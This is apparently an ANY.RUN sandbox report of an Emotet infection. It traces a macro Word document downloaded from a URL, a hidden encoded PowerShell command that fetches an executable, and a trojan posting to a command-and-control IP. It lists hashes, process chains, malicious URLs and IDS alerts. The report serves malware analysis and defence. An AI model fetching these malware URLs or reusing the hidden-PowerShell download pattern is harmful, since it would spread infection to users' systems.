URL: http://herrajesmasota.com/contact_page/ZBEfBfHvasUMKLwJh/
Full analysis: https://app.any.run/tasks/38f73c3f-4aef-4517-938a-89bc466f62fb
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into a very destructive piece of malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: May 24, 2019, 01:11:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: loader, emotet, trojan, feodo, emotet-doc

Indicators:
MD5: D8E050D100B58477475E8E180169D7A2
SHA1: C18E930DE8C976273CCA3A0CFF899EAA14D577B0
SHA256: 49940C78DA8DC473F9044710DE4629E688734002908B6E6891E9F4DAEDA6D9A2
SSDEEP: 3:N1KWAHEbIjGGdLlkUkngHhlq:CWEEbIjzlhHhlq

ANY.RUN is an interactive service that provides full access to the guest system. Information in this report may have been distorted by user actions and is provided as is, for the user's acknowledgement. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • 770.exe (PID: 2992)
      • 770.exe (PID: 968)
      • soundser.exe (PID: 904)
      • soundser.exe (PID: 1356)
    • Downloads executable files from the Internet
      • powershell.exe (PID: 3420)
    • Connects to CnC server
      • soundser.exe (PID: 904)
    • EMOTET was detected
      • soundser.exe (PID: 904)
    • Emotet process was detected
      • soundser.exe (PID: 1356)
  • SUSPICIOUS
    • Starts Microsoft Office Application
      • iexplore.exe (PID: 3316)
      • WINWORD.EXE (PID: 1976)
    • Application launched itself
      • WINWORD.EXE (PID: 1976)
      • 770.exe (PID: 968)
    • PowerShell script executed
      • powershell.exe (PID: 3420)
    • Executed via WMI
      • powershell.exe (PID: 3420)
    • Executable content was dropped or overwritten
      • powershell.exe (PID: 3420)
      • 770.exe (PID: 2992)
    • Starts itself from another location
      • 770.exe (PID: 2992)
    • Creates files in the user directory
      • powershell.exe (PID: 3420)
    • Connects to server without host name
      • soundser.exe (PID: 904)
  • INFO
    • Changes internet zones settings
      • iexplore.exe (PID: 3316)
    • Reads Internet Cache Settings
      • iexplore.exe (PID: 3092)
    • Creates files in the user directory
      • iexplore.exe (PID: 3092)
      • WINWORD.EXE (PID: 1976)
    • Reads internet explorer settings
      • iexplore.exe (PID: 3092)
    • Application launched itself
      • iexplore.exe (PID: 3316)
      • chrome.exe (PID: 2852)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 1976)
      • WINWORD.EXE (PID: 1864)
    • Manual execution by user
      • chrome.exe (PID: 2852)
No Malware configuration.
Total processes: 60
Monitored processes: 27
Malicious processes: 5
Suspicious processes: 0

Behavior graph

(Interactive graph omitted; available in the full report.) Process chain shown: iexplore.exe → iexplore.exe → winword.exe → winword.exe → powershell.exe → 770.exe → 770.exe → soundser.exe → soundser.exe (#EMOTET), plus chrome.exe and its child processes.

Process information

PID: 3316
CMD: "C:\Program Files\Internet Explorer\iexplore.exe" -nohome
Path: C:\Program Files\Internet Explorer\iexplore.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Internet Explorer
Exit code: 1
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 3092
CMD: "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3316 CREDAT:71937
Path: C:\Program Files\Internet Explorer\iexplore.exe
Parent process: iexplore.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Internet Explorer
Exit code: 0
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 1976
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\12CSIY9T\Document_09433331985US_May_21_2019[1].doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: iexplore.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 1864
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Microsoft Word
Exit code: 0
Version: 14.0.6024.1000

PID: 3420
CMD: powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e [base64-encoded command omitted]
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 968
CMD: "C:\Users\admin\770.exe"
Path: C:\Users\admin\770.exe
Parent process: powershell.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0

PID: 2992
CMD: --1fcd1dee
Path: C:\Users\admin\770.exe
Parent process: 770.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0

PID: 1356
CMD: "C:\Users\admin\AppData\Local\soundser\soundser.exe"
Path: C:\Users\admin\AppData\Local\soundser\soundser.exe
Parent process: 770.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0

PID: 904
CMD: --3ab57678
Path: C:\Users\admin\AppData\Local\soundser\soundser.exe
Parent process: soundser.exe
User: admin
Integrity Level: MEDIUM

PID: 2852
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe"
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: explorer.exe
User: admin
Company: Google Inc.
Integrity Level: MEDIUM
Description: Google Chrome
Version: 73.0.3683.75
Total events: 3 086
Read events: 2 494
Write events: 0
Delete events: 0
Modification events: no data

Executable files: 2
Suspicious files: 42
Text files: 168
Unknown types: 17

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
3316 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico | - | - | -
3316 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | - | - | -
3316 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF2CB78F703E34A603.TMP | - | - | -
1976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR920.tmp.cvr | - | - | -
1976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_9054B5BB-3077-40A3-BEDC-86B84B36276E.0\E0BD3088.doc\:Zone.Identifier:$DATA | - | - | -
3092 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\49LQJBZN\desktop.ini | ini | 4A3DEB274BB5F0212C2419D3D8D08612 | 2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
3092 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@herrajesmasota[1].txt | text | E149DB135E344A12FC418F7069F58786 | 7A2512F664D3B9E40684E6513B829CBF91ECC463DA3411D62AADA4EE96F18B4A
3092 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\index.dat | dat | 436D96BAF9395B3A04F0B81B3DC7C881 | 6448A8871E04FA03403DB18320067F15A8E866912CFDCC69C0225B753AC79DD0
3092 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\12CSIY9T\Document_09433331985US_May_21_2019[1].doc | document | 34C47E51F180223CDFC5E09BAC4E1EFD | B5056A4428F82D032102DAF7CBE6F648D82EA7724293AF72D1788DD8E5E74302
1976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 5803AA7D4464BF2FB4B22509ABC05EEC | 9CD271160D69D974542476FE2BF1A564A5E7485CFDC7E7D2BD7270444EB2EC50
HTTP(S) requests: 7
TCP/UDP connections: 27
DNS requests: 21
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
904 | soundser.exe | POST | - | 23.95.95.18:80 | http://23.95.95.18/report/stubs/ringin/ | US | - | - | malicious
3092 | iexplore.exe | GET | 200 | 185.14.56.84:80 | http://herrajesmasota.com/contact_page/ZBEfBfHvasUMKLwJh/ | ES | document | 89.5 Kb | suspicious
3420 | powershell.exe | GET | 200 | 173.249.63.33:80 | http://gawaher-services.com/nngb24y/vXGApWUwd/ | US | executable | 74.0 Kb | suspicious
3420 | powershell.exe | GET | 301 | 138.197.208.96:80 | http://antonresidential.com/wkdrlk/papkaa17/NujUJetNy/ | US | html | 178 b | unknown
2852 | chrome.exe | GET | 200 | 173.194.138.201:80 | http://r4---sn-aigzrn7d.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvMjJlQUFXRC12Ny1ldUFnMXF3SDlXZDlFZw/7319.128.0.1_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx?cms_redirect=yes&mip=217.147.89.18&mm=28&mn=sn-aigzrn7d&ms=nvh&mt=1558660228&mv=m&pl=22&shardbypass=yes | US | crx | 842 Kb | whitelisted
2852 | chrome.exe | GET | 302 | 216.58.207.78:80 | http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvMjJlQUFXRC12Ny1ldUFnMXF3SDlXZDlFZw/7319.128.0.1_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx | US | html | 504 b | whitelisted
3316 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2852 | chrome.exe | 172.217.22.67:443 | www.google.com.ua | Google Inc. | US | whitelisted
2852 | chrome.exe | 172.217.16.163:443 | clientservices.googleapis.com | Google Inc. | US | whitelisted
- | - | 172.217.16.163:443 | clientservices.googleapis.com | Google Inc. | US | whitelisted
3420 | powershell.exe | 173.249.63.33:80 | gawaher-services.com | Contabo GmbH | US | suspicious
3316 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted
3420 | powershell.exe | 69.90.66.10:443 | overcreative.com | Peer 1 Network (USA) Inc. | CA | unknown
2852 | chrome.exe | 172.217.18.109:443 | accounts.google.com | Google Inc. | US | suspicious
3092 | iexplore.exe | 185.14.56.84:80 | herrajesmasota.com | Grupo Sys4net, S.l. | ES | suspicious
3420 | powershell.exe | 138.197.208.96:443 | antonresidential.com | Digital Ocean, Inc. | US | unknown
3420 | powershell.exe | 138.197.208.96:80 | antonresidential.com | Digital Ocean, Inc. | US | unknown

DNS requests

Domain | IP | Reputation
www.bing.com | 204.79.197.200, 13.107.21.200 | whitelisted
herrajesmasota.com | 185.14.56.84 | suspicious
overcreative.com | 69.90.66.10 | unknown
antonresidential.com | 138.197.208.96 | unknown
gawaher-services.com | 173.249.63.33 | suspicious
www.google.com.ua | 172.217.22.67 | whitelisted
clientservices.googleapis.com | 172.217.16.163 | whitelisted
accounts.google.com | 172.217.18.109 | shared
clients1.google.com | 172.217.16.142 | whitelisted
ssl.gstatic.com | 172.217.16.131 | whitelisted

Threats

PID | Process | Class | Message
3092 | iexplore.exe | Potential Corporate Privacy Violation | ET POLICY Office Document Download Containing AutoOpen Macro
3420 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
3420 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3420 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP
904 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 16